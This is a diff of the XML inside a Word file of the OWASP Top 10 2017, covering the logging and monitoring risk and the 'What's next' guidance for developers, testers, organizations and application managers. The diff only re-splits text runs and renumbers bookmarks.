@@ -11141,13 +10717,7 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t xml:space="preserve">OWASP Dependency Check (for </w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>Java and .NET libraries)</w:t>
+          <w:t>OWASP Dependency Check (for Java and .NET libraries)</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -11299,13 +10869,7 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t xml:space="preserve">Snyk: Node/JS, Ruby, Java and Python Vulnerability Database and </w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>Tool</w:t>
+          <w:t>Snyk: Node/JS, Ruby, Java and Python Vulnerability Database and Tool</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -11314,7 +10878,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="101" w:name="a102017-insufficient-logging-detection-a"/>
-      <w:bookmarkStart w:id="102" w:name="_Toc496378429"/>
+      <w:bookmarkStart w:id="102" w:name="_Toc496437907"/>
       <w:bookmarkEnd w:id="101"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -11489,7 +11053,10 @@
       <w:bookmarkStart w:id="103" w:name="am-i-vulnerable-to-insufficient-logging-"/>
       <w:bookmarkEnd w:id="103"/>
       <w:r>
-        <w:t>Am I Vulnerable to Insufficient Logging &amp; Monitoring?</w:t>
+        <w:t>Am I Vulnerable to Insuffi</w:t>
+      </w:r>
+      <w:r>
+        <w:t>cient Logging &amp; Monitoring?</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11521,10 +11088,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Logs of applications and API</w:t>
-      </w:r>
-      <w:r>
-        <w:t>s are not monitored for suspicious activity.</w:t>
+        <w:t>Logs of applications and APIs are not monitored for su</w:t>
+      </w:r>
+      <w:r>
+        <w:t>spicious activity.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11544,13 +11111,13 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>For larger and high performing organizations, the lack of active response, such as re</w:t>
-      </w:r>
-      <w:r>
-        <w:t>al time alerting and response activities such as blocking automated attacks on web apps and particularly APIs would place the organization at risk from extended compromise. The response does not necessarily need to be visible to the attacker, only that the</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> application and associated infrastructure, frameworks, service layers, etc. can detect and alert humans or tools to respond in near real time.</w:t>
+        <w:t>For larger and high performing organizations, the lack of active response, such as real time alerting and respo</w:t>
+      </w:r>
+      <w:r>
+        <w:t>nse activities such as blocking automated attacks on web apps and particularly APIs would place the organization at risk from extended compromise. The response does not necessarily need to be visible to the attacker, only that the application and associate</w:t>
+      </w:r>
+      <w:r>
+        <w:t>d infrastructure, frameworks, service layers, etc. can detect and alert humans or tools to respond in near real time.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11580,10 +11147,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Ensure all login, acc</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ess control failures, input validation failures can be logged with sufficient user context to identify suspicious or malicious accounts, and held for sufficient time to allow delayed forensic analysis.</w:t>
+        <w:t>Ensure all login, access control failures, inpu</w:t>
+      </w:r>
+      <w:r>
+        <w:t>t validation failures can be logged with sufficient user context to identify suspicious or malicious accounts, and held for sufficient time to allow delayed forensic analysis.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11595,10 +11162,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Ensure high value transactions have an audit trail wit</w:t>
-      </w:r>
-      <w:r>
-        <w:t>h integrity controls to prevent tampering or deletion, such as append only database tables or similar.</w:t>
+        <w:t>Ensure high value transactions have an audit trail with integrity controls to pr</w:t>
+      </w:r>
+      <w:r>
+        <w:t>event tampering or deletion, such as append only database tables or similar.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11622,10 +11189,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Establish or adopt</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> an incident response and recovery plan, such as </w:t>
+        <w:t xml:space="preserve">Establish or adopt an incident response and </w:t>
+      </w:r>
+      <w:r>
+        <w:t>recovery plan, such as </w:t>
       </w:r>
       <w:hyperlink r:id="rId158">
         <w:r>
@@ -11666,10 +11233,10 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve">, and </w:t>
-      </w:r>
-      <w:r>
-        <w:t>log correlation software such as </w:t>
+        <w:t>, and log correlation software s</w:t>
+      </w:r>
+      <w:r>
+        <w:t>uch as </w:t>
       </w:r>
       <w:hyperlink r:id="rId161">
         <w:r>
@@ -11705,13 +11272,13 @@
         <w:t>Scenario 1</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:t>An open source project forum software run by a small team was hacked using a flaw in its software. The attackers managed to wipe out the internal source code repository containing the next version, and all of the forum contents. Although source could be re</w:t>
-      </w:r>
-      <w:r>
-        <w:t>covered, the lack of monitoring, logging or alerting led to a far worse breach. The forum software project is no longer active as a result of this issue.</w:t>
+        <w:t>: An open source project for</w:t>
+      </w:r>
+      <w:r>
+        <w:t>um software run by a small team was hacked using a flaw in its software. The attackers managed to wipe out the internal source code repository containing the next version, and all of the forum contents. Although source could be recovered, the lack of monit</w:t>
+      </w:r>
+      <w:r>
+        <w:t>oring, logging or alerting led to a far worse breach. The forum software project is no longer active as a result of this issue.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11725,10 +11292,10 @@
         <w:t>Scenario 2</w:t>
       </w:r>
       <w:r>
-        <w:t>: An attacker uses scans for users using a common password. He can take over all accounts us</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ing this password. For all other users this scan leaves only 1 false login behind. After some days this may be repeated with a different password.</w:t>
+        <w:t>: An attacker uses scans for users using a common password. He can take over all accounts using this password. For all</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> other users this scan leaves only 1 false login behind. After some days this may be repeated with a different password.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11742,10 +11309,10 @@
         <w:t>Scenario 3</w:t>
       </w:r>
       <w:r>
-        <w:t>: A major US retailer reportedly had an internal malware analysis sandbox analyzing attachments. Th</w:t>
-      </w:r>
-      <w:r>
-        <w:t>e sandbox software had detected potentially unwanted software, but no one responded to this detection. The sandbox had been producing warnings for some time before the breach was detected due to fraudulent card transactions by an external bank.</w:t>
+        <w:t>: A major US retailer reportedly had an internal malware analysis sandbox analyzing attachments. The sandbox software had det</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ected potentially unwanted software, but no one responded to this detection. The sandbox had been producing warnings for some time before the breach was detected due to fraudulent card transactions by an external bank.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11859,7 +11426,13 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>CWE-223 Omission of Security-relevant Information</w:t>
+          <w:t>CWE-223</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve"> Omission of Security-relevant Information</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -11885,7 +11458,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="109" w:name="d-whats-next-for-developers"/>
-      <w:bookmarkStart w:id="110" w:name="_Toc496378430"/>
+      <w:bookmarkStart w:id="110" w:name="_Toc496437908"/>
       <w:bookmarkEnd w:id="109"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -11908,10 +11481,10 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Whether you are new to web application security or are already very familiar with these risks, the task of producing a secure web application or fixing an existing one can be difficult. If you have to manage a large application portfolio, this task can be </w:t>
-      </w:r>
-      <w:r>
-        <w:t>daunting.</w:t>
+        <w:t>Whether yo</w:t>
+      </w:r>
+      <w:r>
+        <w:t>u are new to web application security or are already very familiar with these risks, the task of producing a secure web application or fixing an existing one can be difficult. If you have to manage a large application portfolio, this task can be daunting.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11919,10 +11492,10 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">To help organizations and developers reduce their application security risks in a cost effective manner, OWASP has produced numerous free and open resources that you can use to address application security in your organization. The following are </w:t>
-      </w:r>
-      <w:r>
-        <w:t>some of the many resources OWASP has produced to help organizations produce secure web applications and APIs. On the next page, we present additional OWASP resources that can assist organizations in verifying the security of their applications and APIs.</w:t>
+        <w:t>To help organizations and developers reduce their application security risks in a cost effective manner, OWASP has produced numerous free and open resources that you can use to address application security in your organization. The following are some of th</w:t>
+      </w:r>
+      <w:r>
+        <w:t>e many resources OWASP has produced to help organizations produce secure web applications and APIs. On the next page, we present additional OWASP resources that can assist organizations in verifying the security of their applications and APIs.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -11948,10 +11521,7 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Ac</w:t>
-            </w:r>
-            <w:r>
-              <w:t>tivity</w:t>
+              <w:t>Activity</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -11968,7 +11538,10 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Description</w:t>
+              <w:t>Des</w:t>
+            </w:r>
+            <w:r>
+              <w:t>cription</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -12003,13 +11576,13 @@
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
                 </w:rPr>
-                <w:t>OWASP Application Securi</w:t>
+                <w:t>OWASP Application Security Verific</w:t>
               </w:r>
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
                 </w:rPr>
-                <w:t>ty Verification Standard (ASVS)</w:t>
+                <w:t>ation Standard (ASVS)</w:t>
               </w:r>
             </w:hyperlink>
             <w:r>
@@ -12020,13 +11593,13 @@
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
                 </w:rPr>
-                <w:t>OWASP Secure Software Con</w:t>
+                <w:t>OWASP Secure Software Contract Anne</w:t>
               </w:r>
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
                 </w:rPr>
-                <w:t>tract Annex</w:t>
+                <w:t>x</w:t>
               </w:r>
             </w:hyperlink>
             <w:r>
@@ -12210,10 +11783,10 @@
               </w:r>
             </w:hyperlink>
             <w:r>
-              <w:t xml:space="preserve"> provides training materials to help educate developers on web application security. For hands-on learning about vulnerabilities,</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> try </w:t>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">provides training materials to help educate developers on web application security. For hands-on learning about vulnerabilities, try </w:t>
             </w:r>
             <w:hyperlink r:id="rId174">
               <w:r>
@@ -12242,13 +11815,7 @@
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
                 </w:rPr>
-                <w:t>OWASP No</w:t>
-              </w:r>
-              <w:r>
-                <w:rPr>
-                  <w:rStyle w:val="Hyperlink"/>
-                </w:rPr>
-                <w:t>deJS Goat</w:t>
+                <w:t>OWASP NodeJS Goat</w:t>
               </w:r>
             </w:hyperlink>
             <w:r>
@@ -12274,10 +11841,7 @@
               </w:r>
             </w:hyperlink>
             <w:r>
-              <w:t xml:space="preserve">. To stay </w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve">current, come to an </w:t>
+              <w:t xml:space="preserve">. To stay current, come to an </w:t>
             </w:r>
             <w:hyperlink r:id="rId179">
               <w:r>
@@ -12288,7 +11852,10 @@
               </w:r>
             </w:hyperlink>
             <w:r>
-              <w:t xml:space="preserve">, </w:t>
+              <w:t>,</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:hyperlink r:id="rId180">
               <w:r>
@@ -12321,24 +11888,24 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">There are numerous additional OWASP resources available for your use. Please visit the </w:t>
+        <w:t>There are numerous addition</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">al OWASP resources available for your use. Please visit the </w:t>
       </w:r>
       <w:hyperlink r:id="rId182">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>OWA</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>SP Projects</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve"> page, which lists all the Flagship, Labs, and Incubator projects in the OWASP project inventory. Most OWASP resources are available on our </w:t>
+          <w:t>OWASP Projects</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> page, which lists all the Flagship, Labs, and Incubator projects in the OWASP project inventory. Most OWASP resources are</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> available on our </w:t>
       </w:r>
       <w:hyperlink r:id="rId183">
         <w:r>
@@ -12368,7 +11935,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="112" w:name="t-whats-next-for-security-testing"/>
-      <w:bookmarkStart w:id="113" w:name="_Toc496378431"/>
+      <w:bookmarkStart w:id="113" w:name="_Toc496437909"/>
       <w:bookmarkEnd w:id="112"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -12383,7 +11950,10 @@
       <w:bookmarkStart w:id="114" w:name="establish-continuous-application-securit"/>
       <w:bookmarkEnd w:id="114"/>
       <w:r>
-        <w:t>Establish Continuous Application Security Testing</w:t>
+        <w:t>Establish Continuous Application Securi</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ty Testing</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12391,13 +11961,13 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>Building code securely is important. But it’s critical to verify that the security you intended to build is actu</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">ally present, correctly implemented, and used everywhere it was supposed to be. The goal of application security testing is to provide this evidence. The work is difficult and complex, and modern high-speed development processes like Agile and DevOps have </w:t>
-      </w:r>
-      <w:r>
-        <w:t>put extreme pressure on traditional approaches and tools. So we strongly encourage you to put some thought into how you are going to focus on what’s important across your entire application portfolio, and do it cost-effectively.</w:t>
+        <w:t>Building code securely is important. But it’s critical to verify that the security you intended to build is actually present, correctly implemented, and used everywhere it was supposed to be. The goal of application security testing is to provid</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">e this evidence. The work is difficult and complex, and modern high-speed development processes like Agile and DevOps have put extreme pressure on traditional approaches and tools. So we strongly encourage you to put some thought into how you are going to </w:t>
+      </w:r>
+      <w:r>
+        <w:t>focus on what’s important across your entire application portfolio, and do it cost-effectively.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12405,16 +11975,13 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Modern risks move quickly, </w:t>
-      </w:r>
-      <w:r>
-        <w:t>so the days of scanning or penetration testing an application for vulnerabilities once every year or so are long gone. Modern software development requires continuous application security testing across the entire software development lifecycle. Look to en</w:t>
-      </w:r>
-      <w:r>
-        <w:t>hance existing development pipelines with security automation that doesn’t slow development. Whatever approach you choose, consider the annual cost to test, triage, remediate, retest, and redeploy a single application, multiplied by the size of your applic</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ation portfolio.</w:t>
+        <w:t>Modern risks move quickly, so the days of scanning or penetration testing an application for vulnerabilities once every year or so are long gone. Modern softwar</w:t>
+      </w:r>
+      <w:r>
+        <w:t>e development requires continuous application security testing across the entire software development lifecycle. Look to enhance existing development pipelines with security automation that doesn’t slow development. Whatever approach you choose, consider t</w:t>
+      </w:r>
+      <w:r>
+        <w:t>he annual cost to test, triage, remediate, retest, and redeploy a single application, multiplied by the size of your application portfolio.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -12591,10 +12158,13 @@
               </w:r>
             </w:hyperlink>
             <w:r>
-              <w:t xml:space="preserve"> can be great sources of functional and non-functional security requirements in you</w:t>
-            </w:r>
-            <w:r>
-              <w:t>r unit and integration testing. Be sure to consider the human resources required to deal with false positives from the use of automated tooling, as well as the serious dangers of false negatives.</w:t>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:t>can be great sources of functional and non-functional security requirements in your unit and integration testing. Be sure to consider the human resources required to deal with false positives from the use of automated tooling, as well as the serious danger</w:t>
+            </w:r>
+            <w:r>
+              <w:t>s of false negatives.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -12622,13 +12192,13 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>No matter how good you are at testi</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve">ng, it won’t make any difference unless you communicate it effectively. Build trust by showing you understand how the application works. Describe clearly how it can be abused without “lingo” and include an attack scenario to make it real. Make a realistic </w:t>
-            </w:r>
-            <w:r>
-              <w:t>estimation of how hard the vulnerability is to discover and exploit, and how bad that would be. Finally, deliver findings in the tools development teams are already using, not PDF files.</w:t>
+              <w:t>No matter how good you are at testing, it won’t make any difference unless you communicate it effectively. Build trust by showing you understand how the application works. Describe clearly how it can be abused</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> without “lingo” and include an attack scenario to make it real. Make a realistic estimation of how hard the vulnerability is to discover and exploit, and how bad that would be. Finally, deliver findings in the tools development teams are already using, no</w:t>
+            </w:r>
+            <w:r>
+              <w:t>t PDF files.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -12639,7 +12209,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="115" w:name="o-whats-next-for-organizations"/>
-      <w:bookmarkStart w:id="116" w:name="_Toc496378432"/>
+      <w:bookmarkStart w:id="116" w:name="_Toc496437910"/>
       <w:bookmarkEnd w:id="115"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -12654,10 +12224,7 @@
       <w:bookmarkStart w:id="117" w:name="start-your-application-security-program-"/>
       <w:bookmarkEnd w:id="117"/>
       <w:r>
-        <w:t>Start Your Application Security Pro</w:t>
-      </w:r>
-      <w:r>
-        <w:t>gram Now</w:t>
+        <w:t>Start Your Application Security Program Now</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12665,10 +12232,10 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>Application security is no longer optional. Between increasing attacks and regulatory pressures, organizations must establish effective processes and capabilities for securing their applications and APIs. Given the staggering amount of code in the</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> numerous applications and APIs already in production, many organizations are struggling to get a handle on the enormous volume of vulnerabilities.</w:t>
+        <w:t>Application security is no longer optional. Between increasing attacks and regulatory pressures, organizations must establish effective processes and capabilities fo</w:t>
+      </w:r>
+      <w:r>
+        <w:t>r securing their applications and APIs. Given the staggering amount of code in the numerous applications and APIs already in production, many organizations are struggling to get a handle on the enormous volume of vulnerabilities.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12676,16 +12243,16 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t>OWASP recommends organizations establish an application security program to gain insight and improve securit</w:t>
-      </w:r>
-      <w:r>
-        <w:t>y across their app and API portfolio. Achieving application security requires many different parts of an organization to work together efficiently, including security and audit, software development, business, and executive management. Security should be v</w:t>
-      </w:r>
-      <w:r>
-        <w:t>isible and measurable, so that all the different players can see and understand the organization’s application security posture. Focus on the activities and outcomes that actually help improve enterprise security by eliminating or reducing risk. Key activi</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ties include:</w:t>
+        <w:t>OWASP recommends organizat</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ions establish an application security program to gain insight and improve security across their app and API portfolio. Achieving application security requires many different parts of an organization to work together efficiently, including security and aud</w:t>
+      </w:r>
+      <w:r>
+        <w:t>it, software development, business, and executive management. Security should be visible and measurable, so that all the different players can see and understand the organization’s application security posture. Focus on the activities and outcomes that act</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ually help improve enterprise security by eliminating or reducing risk. Key activities include:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12730,10 +12297,7 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>and drive adoption.</w:t>
+        <w:t xml:space="preserve"> and drive adoption.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12756,7 +12320,10 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve"> comparing your organization to your peers to define key improvement areas and an execution plan.</w:t>
+        <w:t xml:space="preserve"> comparing you</w:t>
+      </w:r>
+      <w:r>
+        <w:t>r organization to your peers to define key improvement areas and an execution plan.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12779,7 +12346,10 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve"> for the entireIT organization.</w:t>
+        <w:t xml:space="preserve"> for the</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> entireIT organization.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12819,14 +12389,17 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>application portfolio</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve"> from a business perspective. This should be driven in part by pr</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ivacy laws and other regulations relevant to the data asset being protected.</w:t>
+          <w:t>ap</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>plication portfolio</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> from a business perspective. This should be driven in part by privacy laws and other regulations relevant to the data asset being protected.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12849,10 +12422,7 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve"> with a consistent set of likelihood and impact factors reflec</w:t>
-      </w:r>
-      <w:r>
-        <w:t>tive of your organization's tolerance for risk.</w:t>
+        <w:t xml:space="preserve"> with a consistent set of likelihood and impact factors reflective of your organization's tolerance for risk.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12876,7 +12446,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Establish assurance guidelines to properly define coverage and level of rigor required.</w:t>
+        <w:t>Establish assurance guideli</w:t>
+      </w:r>
+      <w:r>
+        <w:t>nes to properly define coverage and level of rigor required.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12886,10 +12459,7 @@
       <w:bookmarkStart w:id="120" w:name="enable-with-a-strong-foundation"/>
       <w:bookmarkEnd w:id="120"/>
       <w:r>
-        <w:t>Enable with a Strong Fo</w:t>
-      </w:r>
-      <w:r>
-        <w:t>undation</w:t>
+        <w:t>Enable with a Strong Foundation</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12912,7 +12482,10 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve"> that provide an application security baseline for all development teams to adhere to.</w:t>
+        <w:t xml:space="preserve"> that provide an application sec</w:t>
+      </w:r>
+      <w:r>
+        <w:t>urity baseline for all development teams to adhere to.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12935,7 +12508,10 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve"> that complement these policies and standards and provide design and development guidance on their use.</w:t>
+        <w:t xml:space="preserve"> that complement these policies and standards and provide design a</w:t>
+      </w:r>
+      <w:r>
+        <w:t>nd development guidance on their use.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12968,7 +12544,10 @@
       <w:bookmarkStart w:id="121" w:name="integrate-security-into-existing-process"/>
       <w:bookmarkEnd w:id="121"/>
       <w:r>
-        <w:t>Integrate Security into Existing Processes</w:t>
+        <w:t>Integrat</w:t>
+      </w:r>
+      <w:r>
+        <w:t>e Security into Existing Processes</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13002,7 +12581,10 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve"> activities into existing development and operational processes. Activities include </w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">activities into existing development and operational processes. Activities include </w:t>
       </w:r>
       <w:hyperlink r:id="rId200">
         <w:r>
@@ -13058,7 +12640,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Provide subject matter experts and </w:t>
+        <w:t>Provide su</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">bject matter experts and </w:t>
       </w:r>
       <w:hyperlink r:id="rId204">
         <w:r>
@@ -13092,10 +12677,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Manage with metrics. Drive improvement and funding decisions based on the metrics and analysis data captured. Metrics include adherence to security practices / activities, vulnerabilities introduced, vulnerabilities mitigated, application coverage, defect </w:t>
-      </w:r>
-      <w:r>
-        <w:t>density by type and instance counts, etc.</w:t>
+        <w:t>Manage with metrics. Drive improvement and fundin</w:t>
+      </w:r>
+      <w:r>
+        <w:t>g decisions based on the metrics and analysis data captured. Metrics include adherence to security practices / activities, vulnerabilities introduced, vulnerabilities mitigated, application coverage, defect density by type and instance counts, etc.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13107,10 +12692,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Analyze data from the implementation and verification activities to look for root cause and vulnerability patterns to drive strategic and systemic improvements across the enterprise. Learn from mistakes and offer p</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ositive incentives to promote improvements.</w:t>
+        <w:t>Analyze</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> data from the implementation and verification activities to look for root cause and vulnerability patterns to drive strategic and systemic improvements across the enterprise. Learn from mistakes and offer positive incentives to promote improvements.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13120,7 +12705,10 @@
       <w:bookmarkStart w:id="123" w:name="examples-of-such-programs"/>
       <w:bookmarkEnd w:id="123"/>
       <w:r>
-        <w:t>Examples of such programs</w:t>
+        <w:t>Examp</w:t>
+      </w:r>
+      <w:r>
+        <w:t>les of such programs</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13148,14 +12736,11 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="124" w:name="a-whats-next-for-application-managers"/>
-      <w:bookmarkStart w:id="125" w:name="_Toc496378433"/>
+      <w:bookmarkStart w:id="125" w:name="_Toc496437911"/>
       <w:bookmarkEnd w:id="124"/>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>+A: What's next for Application Manage</w:t>
-      </w:r>
-      <w:r>
-        <w:t>rs</w:t>
+        <w:t>+A: What's next for Application Managers</w:t>
       </w:r>
       <w:bookmarkEnd w:id="125"/>
     </w:p>
@@ -13174,10 +12759,10 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>Applications are some of the most complex systems humans regularly create and maintain. IT management for an application should be performed by IT specialists who are responsible for the overall IT lifecycle of an a</w:t>
-      </w:r>
-      <w:r>
-        <w:t>pplication. </w:t>
+        <w:t>Applicat</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ions are some of the most complex systems humans regularly create and maintain. IT management for an application should be performed by IT specialists who are responsible for the overall IT lifecycle of an application. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13185,10 +12770,13 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t>We suggest establishing application owners and application managers for every application to provide accountability, responsibility, consulted and informed (RACI). The application manager is the technical counterpart of the application owner f</w:t>
-      </w:r>
-      <w:r>
-        <w:t>rom business perspective and manages the full application lifecycle, including the security of an application, associate data assets, and documentation. This can help with understanding who can sign off risks, who is responsible for including security.</w:t>
+        <w:t xml:space="preserve">We suggest establishing application </w:t>
+      </w:r>
+      <w:r>
+        <w:t>owners and application managers for every application to provide accountability, responsibility, consulted and informed (RACI). The application manager is the technical counterpart of the application owner from business perspective and manages the full app</w:t>
+      </w:r>
+      <w:r>
+        <w:t>lication lifecycle, including the security of an application, associate data assets, and documentation. This can help with understanding who can sign off risks, who is responsible for including security.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13222,10 +12810,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Compile t</w:t>
-      </w:r>
-      <w:r>
-        <w:t>he technical requirements including functional and non functional security requirements</w:t>
+        <w:t>Compile the technical requirements including f</w:t>
+      </w:r>
+      <w:r>
+        <w:t>unctional and non functional security requirements</w:t>
       </w:r>
